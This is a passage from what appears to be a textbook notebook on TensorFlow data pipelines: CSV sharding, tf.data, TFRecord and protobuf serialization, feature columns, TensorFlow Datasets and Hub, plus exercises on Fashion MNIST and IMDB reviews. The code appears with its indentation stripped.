For a very large dataset that does not fit in memory, you will typically want to split it into many files first, then have TensorFlow read these files in parallel. To demonstrate this, let's start by splitting the housing dataset and saving it to 20 CSV files:
```
def save_to_multiple_csv_files(data, name_prefix, header=None, n_parts=10):
housing_dir = os.path.join("datasets", "housing")
os.makedirs(housing_dir, exist_ok=True)
path_format = os.path.join(housing_dir, "my_{}_{:02d}.csv")
filepaths = []
m = len(data)
for file_idx, row_indices in enumerate(np.array_split(np.arange(m), n_parts)):
part_csv = path_format.format(name_prefix, file_idx)
filepaths.append(part_csv)
with open(part_csv, "wt", encoding="utf-8") as f:
if header is not None:
f.write(header)
f.write("\n")
for row_idx in row_indices:
f.write(",".join([repr(col) for col in data[row_idx]]))
f.write("\n")
return filepaths
train_data = np.c_[X_train, y_train]
valid_data = np.c_[X_valid, y_valid]
test_data = np.c_[X_test, y_test]
header_cols = housing.feature_names + ["MedianHouseValue"]
header = ",".join(header_cols)
train_filepaths = save_to_multiple_csv_files(train_data, "train", header, n_parts=20)
valid_filepaths = save_to_multiple_csv_files(valid_data, "valid", header, n_parts=10)
test_filepaths = save_to_multiple_csv_files(test_data, "test", header, n_parts=10)
```
Okay, now let's take a peek at the first few lines of one of these CSV files:
```
import pandas as pd
pd.read_csv(train_filepaths[0]).head()
```
Or in text mode:
```
with open(train_filepaths[0]) as f:
for i in range(5):
print(f.readline(), end="")
train_filepaths
```
## Building an Input Pipeline
```
filepath_dataset = tf.data.Dataset.list_files(train_filepaths, seed=42)
for filepath in filepath_dataset:
print(filepath)
n_readers = 5
dataset = filepath_dataset.interleave(
lambda filepath: tf.data.TextLineDataset(filepath).skip(1),
cycle_length=n_readers)
for line in dataset.take(5):
print(line.numpy())
```
Notice that field 4 is interpreted as a string, since its default value (`"Hello"`) is a string.
```
record_defaults = [0, np.nan, tf.constant(np.nan, dtype=tf.float64), "Hello", tf.constant([])]
parsed_fields = tf.io.decode_csv('1,2,3,4,5', record_defaults)
parsed_fields
```
Notice that all missing fields are replaced with their default value, when provided:
```
parsed_fields = tf.io.decode_csv(',,,,5', record_defaults)
parsed_fields
```
The 5th field is compulsory (since we provided `tf.constant([])` as the "default value"), so we get an exception if we do not provide it:
```
try:
parsed_fields = tf.io.decode_csv(',,,,', record_defaults)
except tf.errors.InvalidArgumentError as ex:
print(ex)
```
The number of fields should match exactly the number of fields in the `record_defaults`:
```
try:
parsed_fields = tf.io.decode_csv('1,2,3,4,5,6,7', record_defaults)
except tf.errors.InvalidArgumentError as ex:
print(ex)
n_inputs = 8 # X_train.shape[-1]
@tf.function
def preprocess(line):
defs = [0.] * n_inputs + [tf.constant([], dtype=tf.float32)]
fields = tf.io.decode_csv(line, record_defaults=defs)
x = tf.stack(fields[:-1])
y = tf.stack(fields[-1:])
return (x - X_mean) / X_std, y
preprocess(b'4.2083,44.0,5.3232,0.9171,846.0,2.3370,37.47,-122.2,2.782')
def csv_reader_dataset(filepaths, repeat=1, n_readers=5,
n_read_threads=None, shuffle_buffer_size=10000,
n_parse_threads=5, batch_size=32):
dataset = tf.data.Dataset.list_files(filepaths).repeat(repeat)
dataset = dataset.interleave(
lambda filepath: tf.data.TextLineDataset(filepath).skip(1),
cycle_length=n_readers, num_parallel_calls=n_read_threads)
dataset = dataset.shuffle(shuffle_buffer_size)
dataset = dataset.map(preprocess, num_parallel_calls=n_parse_threads)
dataset = dataset.batch(batch_size)
return dataset.prefetch(1)
tf.random.set_seed(42)
train_set = csv_reader_dataset(train_filepaths, batch_size=3)
for X_batch, y_batch in train_set.take(2):
print("X =", X_batch)
print("y =", y_batch)
print()
train_set = csv_reader_dataset(train_filepaths, repeat=None)
valid_set = csv_reader_dataset(valid_filepaths)
test_set = csv_reader_dataset(test_filepaths)
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
model = keras.models.Sequential([
keras.layers.Dense(30, activation="relu", input_shape=X_train.shape[1:]),
keras.layers.Dense(1),
])
model.compile(loss="mse", optimizer=keras.optimizers.SGD(learning_rate=1e-3))
batch_size = 32
model.fit(train_set, steps_per_epoch=len(X_train) // batch_size, epochs=10,
validation_data=valid_set)
model.evaluate(test_set, steps=len(X_test) // batch_size)
new_set = test_set.map(lambda X, y: X) # we could instead just pass test_set, Keras would ignore the labels
X_new = X_test
model.predict(new_set, steps=len(X_new) // batch_size)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
n_epochs = 5
batch_size = 32
n_steps_per_epoch = len(X_train) // batch_size
total_steps = n_epochs * n_steps_per_epoch
global_step = 0
for X_batch, y_batch in train_set.take(total_steps):
global_step += 1
print("\rGlobal step {}/{}".format(global_step, total_steps), end="")
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
@tf.function
def train(model, n_epochs, batch_size=32,
n_readers=5, n_read_threads=5, shuffle_buffer_size=10000, n_parse_threads=5):
train_set = csv_reader_dataset(train_filepaths, repeat=n_epochs, n_readers=n_readers,
n_read_threads=n_read_threads, shuffle_buffer_size=shuffle_buffer_size,
n_parse_threads=n_parse_threads, batch_size=batch_size)
for X_batch, y_batch in train_set:
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train(model, 5)
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
@tf.function
def train(model, n_epochs, batch_size=32,
n_readers=5, n_read_threads=5, shuffle_buffer_size=10000, n_parse_threads=5):
train_set = csv_reader_dataset(train_filepaths, repeat=n_epochs, n_readers=n_readers,
n_read_threads=n_read_threads, shuffle_buffer_size=shuffle_buffer_size,
n_parse_threads=n_parse_threads, batch_size=batch_size)
n_steps_per_epoch = len(X_train) // batch_size
total_steps = n_epochs * n_steps_per_epoch
global_step = 0
for X_batch, y_batch in train_set.take(total_steps):
global_step += 1
if tf.equal(global_step % 100, 0):
tf.print("\rGlobal step", global_step, "/", total_steps)
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train(model, 5)
```
Here is a short description of each method in the `Dataset` class:
```
for m in dir(tf.data.Dataset):
if not (m.startswith("_") or m.endswith("_")):
func = getattr(tf.data.Dataset, m)
if hasattr(func, "__doc__"):
print("● {:21s}{}".format(m + "()", func.__doc__.split("\n")[0]))
```
## The `TFRecord` binary format
A TFRecord file is just a list of binary records. You can create one using a `tf.io.TFRecordWriter`:
```
with tf.io.TFRecordWriter("my_data.tfrecord") as f:
f.write(b"This is the first record")
f.write(b"And this is the second record")
```
And you can read it using a `tf.data.TFRecordDataset`:
```
filepaths = ["my_data.tfrecord"]
dataset = tf.data.TFRecordDataset(filepaths)
for item in dataset:
print(item)
```
You can read multiple TFRecord files with just one `TFRecordDataset`. By default it will read them one at a time, but if you set `num_parallel_reads=3`, it will read 3 at a time in parallel and interleave their records:
```
filepaths = ["my_test_{}.tfrecord".format(i) for i in range(5)]
for i, filepath in enumerate(filepaths):
with tf.io.TFRecordWriter(filepath) as f:
for j in range(3):
f.write("File {} record {}".format(i, j).encode("utf-8"))
dataset = tf.data.TFRecordDataset(filepaths, num_parallel_reads=3)
for item in dataset:
print(item)
options = tf.io.TFRecordOptions(compression_type="GZIP")
with tf.io.TFRecordWriter("my_compressed.tfrecord", options) as f:
f.write(b"This is the first record")
f.write(b"And this is the second record")
dataset = tf.data.TFRecordDataset(["my_compressed.tfrecord"],
compression_type="GZIP")
for item in dataset:
print(item)
```
### A Brief Intro to Protocol Buffers
For this section you need to [install protobuf](https://developers.google.com/protocol-buffers/docs/downloads). In general you will not have to do so when using TensorFlow, as it comes with functions to create and parse protocol buffers of type `tf.train.Example`, which are generally sufficient. However, in this section we will learn about protocol buffers by creating our own simple protobuf definition, so we need the protobuf compiler (`protoc`): we will use it to compile the protobuf definition to a Python module that we can then use in our code.
First let's write a simple protobuf definition:
```
%%writefile person.proto
syntax = "proto3";
message Person {
string name = 1;
int32 id = 2;
repeated string email = 3;
}
```
And let's compile it (the `--descriptor_set_out` and `--include_imports` options are only required for the `tf.io.decode_proto()` example below):
```
!protoc person.proto --python_out=. --descriptor_set_out=person.desc --include_imports
!ls person*
from person_pb2 import Person
person = Person(name="Al", id=123, email=["a@b.com"]) # create a Person
print(person) # display the Person
person.name # read a field
person.name = "Alice" # modify a field
person.email[0] # repeated fields can be accessed like arrays
person.email.append("c@d.com") # add an email address
s = person.SerializeToString() # serialize to a byte string
s
person2 = Person() # create a new Person
person2.ParseFromString(s) # parse the byte string (27 bytes)
person == person2 # now they are equal
```
#### Custom protobuf
In rare cases, you may want to parse a custom protobuf (like the one we just created) in TensorFlow. For this you can use the `tf.io.decode_proto()` function:
```
person_tf = tf.io.decode_proto(
bytes=s,
message_type="Person",
field_names=["name", "id", "email"],
output_types=[tf.string, tf.int32, tf.string],
descriptor_source="person.desc")
person_tf.values
```
For more details, see the [`tf.io.decode_proto()`](https://www.tensorflow.org/api_docs/python/tf/io/decode_proto) documentation.
### TensorFlow Protobufs
Here is the definition of the tf.train.Example protobuf:
```proto
syntax = "proto3";
message BytesList { repeated bytes value = 1; }
message FloatList { repeated float value = 1 [packed = true]; }
message Int64List { repeated int64 value = 1 [packed = true]; }
message Feature {
oneof kind {
BytesList bytes_list = 1;
FloatList float_list = 2;
Int64List int64_list = 3;
}
};
message Features { map<string, Feature> feature = 1; };
message Example { Features features = 1; };
```
**Warning**: in TensorFlow 2.0 and 2.1, there was a bug preventing `from tensorflow.train import X` so we work around it by writing `X = tf.train.X`. See https://github.com/tensorflow/tensorflow/issues/33289 for more details.
```
#from tensorflow.train import BytesList, FloatList, Int64List
#from tensorflow.train import Feature, Features, Example
BytesList = tf.train.BytesList
FloatList = tf.train.FloatList
Int64List = tf.train.Int64List
Feature = tf.train.Feature
Features = tf.train.Features
Example = tf.train.Example
person_example = Example(
features=Features(
feature={
"name": Feature(bytes_list=BytesList(value=[b"Alice"])),
"id": Feature(int64_list=Int64List(value=[123])),
"emails": Feature(bytes_list=BytesList(value=[b"a@b.com", b"c@d.com"]))
}))
with tf.io.TFRecordWriter("my_contacts.tfrecord") as f:
f.write(person_example.SerializeToString())
feature_description = {
"name": tf.io.FixedLenFeature([], tf.string, default_value=""),
"id": tf.io.FixedLenFeature([], tf.int64, default_value=0),
"emails": tf.io.VarLenFeature(tf.string),
}
for serialized_example in tf.data.TFRecordDataset(["my_contacts.tfrecord"]):
parsed_example = tf.io.parse_single_example(serialized_example,
feature_description)
parsed_example
parsed_example
parsed_example["emails"].values[0]
tf.sparse.to_dense(parsed_example["emails"], default_value=b"")
parsed_example["emails"].values
```
### Putting Images in TFRecords
```
from sklearn.datasets import load_sample_images
img = load_sample_images()["images"][0]
plt.imshow(img)
plt.axis("off")
plt.title("Original Image")
plt.show()
data = tf.io.encode_jpeg(img)
example_with_image = Example(features=Features(feature={
"image": Feature(bytes_list=BytesList(value=[data.numpy()]))}))
serialized_example = example_with_image.SerializeToString()
# then save to TFRecord
feature_description = { "image": tf.io.VarLenFeature(tf.string) }
example_with_image = tf.io.parse_single_example(serialized_example, feature_description)
decoded_img = tf.io.decode_jpeg(example_with_image["image"].values[0])
```
Or use `decode_image()`, which supports BMP, GIF, JPEG, and PNG formats:
```
decoded_img = tf.io.decode_image(example_with_image["image"].values[0])
plt.imshow(decoded_img)
plt.title("Decoded Image")
plt.axis("off")
plt.show()
```
### Putting Tensors and Sparse Tensors in TFRecords
Tensors can be serialized and parsed easily using `tf.io.serialize_tensor()` and `tf.io.parse_tensor()`:
```
t = tf.constant([[0., 1.], [2., 3.], [4., 5.]])
s = tf.io.serialize_tensor(t)
s
tf.io.parse_tensor(s, out_type=tf.float32)
serialized_sparse = tf.io.serialize_sparse(parsed_example["emails"])
serialized_sparse
BytesList(value=serialized_sparse.numpy())
dataset = tf.data.TFRecordDataset(["my_contacts.tfrecord"]).batch(10)
for serialized_examples in dataset:
parsed_examples = tf.io.parse_example(serialized_examples,
feature_description)
parsed_examples
```
## Handling Sequential Data Using `SequenceExample`
```proto
syntax = "proto3";
message FeatureList { repeated Feature feature = 1; };
message FeatureLists { map<string, FeatureList> feature_list = 1; };
message SequenceExample {
Features context = 1;
FeatureLists feature_lists = 2;
};
```
**Warning**: in TensorFlow 2.0 and 2.1, there was a bug preventing `from tensorflow.train import X` so we work around it by writing `X = tf.train.X`. See https://github.com/tensorflow/tensorflow/issues/33289 for more details.
```
#from tensorflow.train import FeatureList, FeatureLists, SequenceExample
FeatureList = tf.train.FeatureList
FeatureLists = tf.train.FeatureLists
SequenceExample = tf.train.SequenceExample
context = Features(feature={
"author_id": Feature(int64_list=Int64List(value=[123])),
"title": Feature(bytes_list=BytesList(value=[b"A", b"desert", b"place", b"."])),
"pub_date": Feature(int64_list=Int64List(value=[1623, 12, 25]))
})
content = [["When", "shall", "we", "three", "meet", "again", "?"],
["In", "thunder", ",", "lightning", ",", "or", "in", "rain", "?"]]
comments = [["When", "the", "hurlyburly", "'s", "done", "."],
["When", "the", "battle", "'s", "lost", "and", "won", "."]]
def words_to_feature(words):
return Feature(bytes_list=BytesList(value=[word.encode("utf-8")
for word in words]))
content_features = [words_to_feature(sentence) for sentence in content]
comments_features = [words_to_feature(comment) for comment in comments]
sequence_example = SequenceExample(
context=context,
feature_lists=FeatureLists(feature_list={
"content": FeatureList(feature=content_features),
"comments": FeatureList(feature=comments_features)
}))
sequence_example
serialized_sequence_example = sequence_example.SerializeToString()
context_feature_descriptions = {
"author_id": tf.io.FixedLenFeature([], tf.int64, default_value=0),
"title": tf.io.VarLenFeature(tf.string),
"pub_date": tf.io.FixedLenFeature([3], tf.int64, default_value=[0, 0, 0]),
}
sequence_feature_descriptions = {
"content": tf.io.VarLenFeature(tf.string),
"comments": tf.io.VarLenFeature(tf.string),
}
parsed_context, parsed_feature_lists = tf.io.parse_single_sequence_example(
serialized_sequence_example, context_feature_descriptions,
sequence_feature_descriptions)
parsed_context
parsed_context["title"].values
parsed_feature_lists
print(tf.RaggedTensor.from_sparse(parsed_feature_lists["content"]))
```
# The Features API
Let's use the variant of the California housing dataset that we used in Chapter 2, since it contains categorical features and missing values:
```
import os
import tarfile
import urllib.request
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
os.makedirs(housing_path, exist_ok=True)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
fetch_housing_data()
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
housing = load_housing_data()
housing.head()
housing_median_age = tf.feature_column.numeric_column("housing_median_age")
age_mean, age_std = X_mean[1], X_std[1] # the median age is in column 1
housing_median_age = tf.feature_column.numeric_column(
"housing_median_age", normalizer_fn=lambda x: (x - age_mean) / age_std)
median_income = tf.feature_column.numeric_column("median_income")
bucketized_income = tf.feature_column.bucketized_column(
median_income, boundaries=[1.5, 3., 4.5, 6.])
bucketized_income
ocean_prox_vocab = ['<1H OCEAN', 'INLAND', 'ISLAND', 'NEAR BAY', 'NEAR OCEAN']
ocean_proximity = tf.feature_column.categorical_column_with_vocabulary_list(
"ocean_proximity", ocean_prox_vocab)
ocean_proximity
# Just an example, it's not used later on
city_hash = tf.feature_column.categorical_column_with_hash_bucket(
"city", hash_bucket_size=1000)
city_hash
bucketized_age = tf.feature_column.bucketized_column(
housing_median_age, boundaries=[-1., -0.5, 0., 0.5, 1.]) # age was scaled
age_and_ocean_proximity = tf.feature_column.crossed_column(
[bucketized_age, ocean_proximity], hash_bucket_size=100)
latitude = tf.feature_column.numeric_column("latitude")
longitude = tf.feature_column.numeric_column("longitude")
bucketized_latitude = tf.feature_column.bucketized_column(
latitude, boundaries=list(np.linspace(32., 42., 20 - 1)))
bucketized_longitude = tf.feature_column.bucketized_column(
longitude, boundaries=list(np.linspace(-125., -114., 20 - 1)))
location = tf.feature_column.crossed_column(
[bucketized_latitude, bucketized_longitude], hash_bucket_size=1000)
ocean_proximity_one_hot = tf.feature_column.indicator_column(ocean_proximity)
ocean_proximity_embed = tf.feature_column.embedding_column(ocean_proximity,
dimension=2)
```
## Using Feature Columns for Parsing
```
median_house_value = tf.feature_column.numeric_column("median_house_value")
columns = [housing_median_age, median_house_value]
feature_descriptions = tf.feature_column.make_parse_example_spec(columns)
feature_descriptions
with tf.io.TFRecordWriter("my_data_with_features.tfrecords") as f:
for x, y in zip(X_train[:, 1:2], y_train):
example = Example(features=Features(feature={
"housing_median_age": Feature(float_list=FloatList(value=[x])),
"median_house_value": Feature(float_list=FloatList(value=[y]))
}))
f.write(example.SerializeToString())
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
def parse_examples(serialized_examples):
examples = tf.io.parse_example(serialized_examples, feature_descriptions)
targets = examples.pop("median_house_value") # separate the targets
return examples, targets
batch_size = 32
dataset = tf.data.TFRecordDataset(["my_data_with_features.tfrecords"])
dataset = dataset.repeat().shuffle(10000).batch(batch_size).map(parse_examples)
```
**Warning**: the `DenseFeatures` layer currently does not work with the Functional API, see [TF issue #27416](https://github.com/tensorflow/tensorflow/issues/27416). Hopefully this will be resolved before the final release of TF 2.0.
```
columns_without_target = columns[:-1]
model = keras.models.Sequential([
keras.layers.DenseFeatures(feature_columns=columns_without_target),
keras.layers.Dense(1)
])
model.compile(loss="mse",
optimizer=keras.optimizers.SGD(learning_rate=1e-3),
metrics=["accuracy"])
model.fit(dataset, steps_per_epoch=len(X_train) // batch_size, epochs=5)
some_columns = [ocean_proximity_embed, bucketized_income]
dense_features = keras.layers.DenseFeatures(some_columns)
dense_features({
"ocean_proximity": [["NEAR OCEAN"], ["INLAND"], ["INLAND"]],
"median_income": [[3.], [7.2], [1.]]
})
```
# TF Transform
```
try:
import tensorflow_transform as tft
def preprocess(inputs): # inputs is a batch of input features
median_age = inputs["housing_median_age"]
ocean_proximity = inputs["ocean_proximity"]
standardized_age = tft.scale_to_z_score(median_age - tft.mean(median_age))
ocean_proximity_id = tft.compute_and_apply_vocabulary(ocean_proximity)
return {
"standardized_median_age": standardized_age,
"ocean_proximity_id": ocean_proximity_id
}
except ImportError:
print("TF Transform is not installed. Try running: pip3 install -U tensorflow-transform")
```
# TensorFlow Datasets
```
import tensorflow_datasets as tfds
datasets = tfds.load(name="mnist")
mnist_train, mnist_test = datasets["train"], datasets["test"]
print(tfds.list_builders())
plt.figure(figsize=(6,3))
mnist_train = mnist_train.repeat(5).batch(32).prefetch(1)
for item in mnist_train:
images = item["image"]
labels = item["label"]
for index in range(5):
plt.subplot(1, 5, index + 1)
image = images[index, ..., 0]
label = labels[index].numpy()
plt.imshow(image, cmap="binary")
plt.title(label)
plt.axis("off")
break # just showing part of the first batch
datasets = tfds.load(name="mnist")
mnist_train, mnist_test = datasets["train"], datasets["test"]
mnist_train = mnist_train.repeat(5).batch(32)
mnist_train = mnist_train.map(lambda items: (items["image"], items["label"]))
mnist_train = mnist_train.prefetch(1)
for images, labels in mnist_train.take(1):
print(images.shape)
print(labels.numpy())
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
datasets = tfds.load(name="mnist", batch_size=32, as_supervised=True)
mnist_train = datasets["train"].repeat().prefetch(1)
model = keras.models.Sequential([
keras.layers.Flatten(input_shape=[28, 28, 1]),
keras.layers.Lambda(lambda images: tf.cast(images, tf.float32)),
keras.layers.Dense(10, activation="softmax")])
model.compile(loss="sparse_categorical_crossentropy",
optimizer=keras.optimizers.SGD(learning_rate=1e-3),
metrics=["accuracy"])
model.fit(mnist_train, steps_per_epoch=60000 // 32, epochs=5)
```
# TensorFlow Hub
```
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
import tensorflow_hub as hub
hub_layer = hub.KerasLayer("https://tfhub.dev/google/nnlm-en-dim50/2",
output_shape=[50], input_shape=[], dtype=tf.string)
model = keras.Sequential()
model.add(hub_layer)
model.add(keras.layers.Dense(16, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.summary()
sentences = tf.constant(["It was a great movie", "The actors were amazing"])
embeddings = hub_layer(sentences)
embeddings
```
# Exercises
## 1. to 8.
See Appendix A
## 9.
### a.
_Exercise: Load the Fashion MNIST dataset (introduced in Chapter 10); split it into a training set, a validation set, and a test set; shuffle the training set; and save each dataset to multiple TFRecord files. Each record should be a serialized `Example` protobuf with two features: the serialized image (use `tf.io.serialize_tensor()` to serialize each image), and the label. Note: for large images, you could use `tf.io.encode_jpeg()` instead. This would save a lot of space, but it would lose a bit of image quality._
```
(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.fashion_mnist.load_data()
X_valid, X_train = X_train_full[:5000], X_train_full[5000:]
y_valid, y_train = y_train_full[:5000], y_train_full[5000:]
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
train_set = tf.data.Dataset.from_tensor_slices((X_train, y_train)).shuffle(len(X_train))
valid_set = tf.data.Dataset.from_tensor_slices((X_valid, y_valid))
test_set = tf.data.Dataset.from_tensor_slices((X_test, y_test))
def create_example(image, label):
image_data = tf.io.serialize_tensor(image)
#image_data = tf.io.encode_jpeg(image[..., np.newaxis])
return Example(
features=Features(
feature={
"image": Feature(bytes_list=BytesList(value=[image_data.numpy()])),
"label": Feature(int64_list=Int64List(value=[label])),
}))
for image, label in valid_set.take(1):
print(create_example(image, label))
```
The following function saves a given dataset to a set of TFRecord files. The examples are written to the files in a round-robin fashion. To do this, we enumerate all the examples using the `dataset.enumerate()` method, and we compute `index % n_shards` to decide which file to write to. We use the standard `contextlib.ExitStack` class to make sure that all writers are properly closed whether or not an I/O error occurs while writing.
```
from contextlib import ExitStack
def write_tfrecords(name, dataset, n_shards=10):
paths = ["{}.tfrecord-{:05d}-of-{:05d}".format(name, index, n_shards)
for index in range(n_shards)]
with ExitStack() as stack:
writers = [stack.enter_context(tf.io.TFRecordWriter(path))
for path in paths]
for index, (image, label) in dataset.enumerate():
shard = index % n_shards
example = create_example(image, label)
writers[shard].write(example.SerializeToString())
return paths
train_filepaths = write_tfrecords("my_fashion_mnist.train", train_set)
valid_filepaths = write_tfrecords("my_fashion_mnist.valid", valid_set)
test_filepaths = write_tfrecords("my_fashion_mnist.test", test_set)
```
### b.
_Exercise: Then use tf.data to create an efficient dataset for each set. Finally, use a Keras model to train these datasets, including a preprocessing layer to standardize each input feature. Try to make the input pipeline as efficient as possible, using TensorBoard to visualize profiling data._
```
def preprocess(tfrecord):
feature_descriptions = {
"image": tf.io.FixedLenFeature([], tf.string, default_value=""),
"label": tf.io.FixedLenFeature([], tf.int64, default_value=-1)
}
example = tf.io.parse_single_example(tfrecord, feature_descriptions)
image = tf.io.parse_tensor(example["image"], out_type=tf.uint8)
#image = tf.io.decode_jpeg(example["image"])
image = tf.reshape(image, shape=[28, 28])
return image, example["label"]
def mnist_dataset(filepaths, n_read_threads=5, shuffle_buffer_size=None,
n_parse_threads=5, batch_size=32, cache=True):
dataset = tf.data.TFRecordDataset(filepaths,
num_parallel_reads=n_read_threads)
if cache:
dataset = dataset.cache()
if shuffle_buffer_size:
dataset = dataset.shuffle(shuffle_buffer_size)
dataset = dataset.map(preprocess, num_parallel_calls=n_parse_threads)
dataset = dataset.batch(batch_size)
return dataset.prefetch(1)
train_set = mnist_dataset(train_filepaths, shuffle_buffer_size=60000)
valid_set = mnist_dataset(valid_filepaths)
test_set = mnist_dataset(test_filepaths)
for X, y in train_set.take(1):
for i in range(5):
plt.subplot(1, 5, i + 1)
plt.imshow(X[i].numpy(), cmap="binary")
plt.axis("off")
plt.title(str(y[i].numpy()))
keras.backend.clear_session()
tf.random.set_seed(42)
np.random.seed(42)
class Standardization(keras.layers.Layer):
def adapt(self, data_sample):
self.means_ = np.mean(data_sample, axis=0, keepdims=True)
self.stds_ = np.std(data_sample, axis=0, keepdims=True)
def call(self, inputs):
return (inputs - self.means_) / (self.stds_ + keras.backend.epsilon())
standardization = Standardization(input_shape=[28, 28])
# or perhaps soon:
#standardization = keras.layers.Normalization()
sample_image_batches = train_set.take(100).map(lambda image, label: image)
sample_images = np.concatenate(list(sample_image_batches.as_numpy_iterator()),
axis=0).astype(np.float32)
standardization.adapt(sample_images)
model = keras.models.Sequential([
standardization,
keras.layers.Flatten(),
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(10, activation="softmax")
])
model.compile(loss="sparse_categorical_crossentropy",
optimizer="nadam", metrics=["accuracy"])
from datetime import datetime
logs = os.path.join(os.curdir, "my_logs",
"run_" + datetime.now().strftime("%Y%m%d_%H%M%S"))
tensorboard_cb = tf.keras.callbacks.TensorBoard(
log_dir=logs, histogram_freq=1, profile_batch=10)
model.fit(train_set, epochs=5, validation_data=valid_set,
callbacks=[tensorboard_cb])
```
**Warning:** The profiling tab in TensorBoard works if you use TensorFlow 2.2+. You also need to make sure `tensorboard_plugin_profile` is installed (and restart Jupyter if necessary).
```
%load_ext tensorboard
%tensorboard --logdir=./my_logs --port=6006
```
## 10.
_Exercise: In this exercise you will download a dataset, split it, create a `tf.data.Dataset` to load it and preprocess it efficiently, then build and train a binary classification model containing an `Embedding` layer._
### a.
_Exercise: Download the [Large Movie Review Dataset](https://homl.info/imdb), which contains 50,000 movie reviews from the [Internet Movie Database](https://imdb.com/). The data is organized in two directories, `train` and `test`, each containing a `pos` subdirectory with 12,500 positive reviews and a `neg` subdirectory with 12,500 negative reviews. Each review is stored in a separate text file. There are other files and folders (including preprocessed bag-of-words), but we will ignore them in this exercise._
```
from pathlib import Path
DOWNLOAD_ROOT = "http://ai.stanford.edu/~amaas/data/sentiment/"
FILENAME = "aclImdb_v1.tar.gz"
filepath = keras.utils.get_file(FILENAME, DOWNLOAD_ROOT + FILENAME, extract=True)
path = Path(filepath).parent / "aclImdb"
path
for name, subdirs, files in os.walk(path):
indent = len(Path(name).parts) - len(path.parts)
print(" " * indent + Path(name).parts[-1] + os.sep)
for index, filename in enumerate(sorted(files)):
if index == 3:
print(" " * (indent + 1) + "...")
break
print(" " * (indent + 1) + filename)
def review_paths(dirpath):
return [str(path) for path in dirpath.glob("*.txt")]
train_pos = review_paths(path / "train" / "pos")
train_neg = review_paths(path / "train" / "neg")
test_valid_pos = review_paths(path / "test" / "pos")
test_valid_neg = review_paths(path / "test" / "neg")
len(train_pos), len(train_neg), len(test_valid_pos), len(test_valid_neg)
```
### b.
_Exercise: Split the test set into a validation set (15,000) and a test set (10,000)._
```
np.random.shuffle(test_valid_pos)
np.random.shuffle(test_valid_neg)
test_pos = test_valid_pos[:5000]
test_neg = test_valid_neg[:5000]
valid_pos = test_valid_pos[5000:]
valid_neg = test_valid_neg[5000:]
```
### c.
_Exercise: Use tf.data to create an efficient dataset for each set._
Since the dataset fits in memory, we can just load all the data using pure Python code and use `tf.data.Dataset.from_tensor_slices()`:
```
def imdb_dataset(filepaths_positive, filepaths_negative):
reviews = []
labels = []
for filepaths, label in ((filepaths_negative, 0), (filepaths_positive, 1)):
for filepath in filepaths:
with open(filepath) as review_file:
reviews.append(review_file.read())
labels.append(label)
return tf.data.Dataset.from_tensor_slices(
(tf.constant(reviews), tf.constant(labels)))
for X, y in imdb_dataset(train_pos, train_neg).take(3):
print(X)
print(y)
print()
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).repeat(10): pass
```
It takes about 17 seconds to load the dataset and go through it 10 times.
But let's pretend the dataset does not fit in memory, just to make things more interesting. Luckily, each review fits on just one line (they use `<br />` to indicate line breaks), so we can read the reviews using a `TextLineDataset`. If they didn't, we would have to preprocess the input files (e.g., converting them to TFRecords). For very large datasets, it would make sense to use a tool like Apache Beam for that.
```
def imdb_dataset(filepaths_positive, filepaths_negative, n_read_threads=5):
dataset_neg = tf.data.TextLineDataset(filepaths_negative,
num_parallel_reads=n_read_threads)
dataset_neg = dataset_neg.map(lambda review: (review, 0))
dataset_pos = tf.data.TextLineDataset(filepaths_positive,
num_parallel_reads=n_read_threads)
dataset_pos = dataset_pos.map(lambda review: (review, 1))
return tf.data.Dataset.concatenate(dataset_pos, dataset_neg)
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).repeat(10): pass
```
Now it takes about 33 seconds to go through the dataset 10 times. That's much slower, essentially because the dataset is not cached in RAM, so it must be reloaded at each epoch. If you add `.cache()` just before `.repeat(10)`, you will see that this implementation will be about as fast as the previous one.
```
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).cache().repeat(10): pass
batch_size = 32
train_set = imdb_dataset(train_pos, train_neg).shuffle(25000).batch(batch_size).prefetch(1)
valid_set = imdb_dataset(valid_pos, valid_neg).batch(batch_size).prefetch(1)
test_set = imdb_dataset(test_pos, test_neg).batch(batch_size).prefetch(1)
```
### d.
